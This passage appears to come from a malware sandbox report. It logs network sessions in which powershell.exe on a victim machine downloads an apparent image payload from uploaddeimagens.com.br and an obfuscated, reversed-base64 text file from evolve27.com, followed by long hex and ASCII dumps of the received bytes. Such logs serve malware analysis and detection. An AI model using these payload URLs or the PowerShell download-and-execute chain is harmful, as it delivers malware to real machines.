ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 Data Ascii: HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}
2024-05-04 07:50:38 UTC	1369	IN	Data Raw: cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 Data Ascii: vOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd
2024-05-04 07:50:38 UTC	1369	IN	Data Raw: fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 Data Ascii: f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
2024-05-04 07:50:38 UTC	1369	IN	Data Raw: 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
2024-05-04 07:50:38 UTC	1369	IN	Data Raw: 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 Data Ascii: nq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@BH5
2024-05-04 07:50:38 UTC	1369	IN	Data Raw: 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd Data Ascii: K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.3	49733	104.21.45.138	443	8024	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:40 UTC	100	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br
2024-05-04 07:50:40 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:50:40 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 122 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oSNHVDqWeNVA4tJgolSvpkAOWjeS0SUiLfaUMECc4oAuptCDvxcK6T0%2BTgZTR67KKK8ZoMJd93FGYYgrD8%2FpZQzrtJUrHGXrcfr2PJZSLdoclfXXP7H99g6PpQdKAjRPjMx81p91ZyKY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e6e6b66dd37c04-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 07:50:40 UTC	677	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-05-04 07:50:40 UTC	1369	IN	Data Raw: 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 Data Ascii: TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4ApC.
2024-05-04 07:50:40 UTC	1369	IN	Data Raw: 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 Data Ascii: Ay2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1
2024-05-04 07:50:40 UTC	1369	IN	Data Raw: fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 Data Ascii: r7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(h
2024-05-04 07:50:40 UTC	1369	IN	Data Raw: c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 Data Ascii: HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}
2024-05-04 07:50:40 UTC	1369	IN	Data Raw: cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 Data Ascii: vOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd
2024-05-04 07:50:40 UTC	1369	IN	Data Raw: fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 Data Ascii: f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
2024-05-04 07:50:40 UTC	1369	IN	Data Raw: 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
2024-05-04 07:50:40 UTC	1369	IN	Data Raw: 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 Data Ascii: nq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@BH5
2024-05-04 07:50:40 UTC	1369	IN	Data Raw: 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd Data Ascii: K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.3	49734	131.153.147.50	443	8024	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:52 UTC	79	OUT	GET /nm/xwomay.txt HTTP/1.1 Host: www.evolve27.com Connection: Keep-Alive
2024-05-04 07:50:53 UTC	208	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:50:52 GMT Server: Apache Last-Modified: Thu, 02 May 2024 15:35:07 GMT Accept-Ranges: bytes Content-Length: 47788 Connection: close Content-Type: text/plain
2024-05-04 07:50:53 UTC	7984	IN	Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-05-04 07:50:53 UTC	8000	IN	Data Raw: 66 41 41 41 6a 41 77 49 41 4d 43 41 67 6b 41 41 41 41 43 41 67 41 77 49 41 4d 43 41 6a 73 41 41 41 30 46 41 4f 42 77 54 41 41 43 41 36 41 77 53 41 4d 45 41 50 42 41 54 41 4d 46 41 51 42 51 51 41 4d 45 41 62 31 42 41 41 30 46 41 47 42 67 52 41 38 45 41 67 41 67 4f 41 73 45 41 44 42 77 54 41 77 45 41 54 42 41 55 41 45 45 41 44 42 77 57 66 41 41 41 73 42 51 59 41 51 48 41 70 42 41 63 41 45 47 41 44 39 41 41 41 30 46 41 69 42 51 59 41 51 46 41 62 74 41 41 41 49 47 41 68 42 41 56 48 41 41 41 64 42 67 54 41 6b 45 41 58 42 77 57 4c 41 41 41 75 42 51 61 41 63 46 41 4d 6c 41 41 41 30 46 41 72 42 77 59 41 45 47 41 43 42 77 57 4e 41 41 41 72 42 77 59 41 45 47 41 43 6c 41 41 41 6b 48 41 6c 42 77 53 41 51 48 41 6d 42 51 61 41 67 47 41 54 42 41 54 54 41 41 41 64 42 41 Data Ascii: fAAAjAwIAMCAgkAAAACAgAwIAMCAjsAAA0FAOBwTAACA6AwSAMEAPBATAMFAQBQQAMEAb1BAA0FAGBgRA8EAgAgOAsEADBwTAwEATBAUAEEADBwWfAAAsBQYAQHApBAcAEGAD9AAA0FAiBQYAQFAbtAAAIGAhBAVHAAAdBgTAkEAXBwWLAAAuBQaAcFAMlAAA0FArBwYAEGACBwWNAAArBwYAEGAClAAAkHAlBwSAQHAmBQaAgGATBATTAAAdBA
2024-05-04 07:50:53 UTC	8000	IN	Data Raw: 30 35 57 5a 32 56 45 41 7a 64 57 59 73 5a 45 64 6c 74 32 59 76 4e 46 41 30 4e 57 5a 75 35 32 62 44 42 67 63 6c 64 57 5a 30 35 57 53 76 52 46 41 6c 70 58 61 54 4a 58 5a 6d 5a 57 64 43 52 6d 62 6c 4e 31 58 30 56 32 63 41 55 6d 65 70 4e 6c 63 6c 5a 6d 5a 31 4a 55 5a 32 6c 57 5a 6a 56 6d 55 66 52 58 5a 7a 42 51 5a 30 6c 6e 51 41 55 47 63 35 52 46 62 76 4e 32 62 30 39 6d 63 51 42 51 5a 77 6c 48 56 30 56 32 61 6a 39 32 55 41 6b 48 62 70 31 57 59 47 4e 33 63 6c 4a 48 5a 6b 46 45 41 72 4e 57 59 69 78 47 62 68 4e 6b 63 6c 31 57 61 55 42 51 4e 66 39 46 4a 68 52 6d 59 74 46 47 54 66 42 41 4d 68 42 41 4e 66 39 46 4a 68 52 6d 59 74 46 47 54 66 42 51 5a 30 56 6e 59 70 4a 48 64 30 46 45 5a 68 56 6d 63 6f 52 56 51 55 4e 46 41 6c 35 32 54 30 6c 57 59 58 42 51 5a 73 52 6d Data Ascii: 05WZ2VEAzdWYsZEdlt2YvNFA0NWZu52bDBgcldWZ05WSvRFAlpXaTJXZmZWdCRmblN1X0V2cAUmepNlclZmZ1JUZ2lWZjVmUfRXZzBQZ0lnQAUGc5RFbvN2b09mcQBQZwlHV0V2aj92UAkHbp1WYGN3clJHZkFEArNWYixGbhNkcl1WaUBQNf9FJhRmYtFGTfBAMhBANf9FJhRmYtFGTfBQZ0VnYpJHd0FEZhVmcoRVQUNFAl52T0lWYXBQZsRm
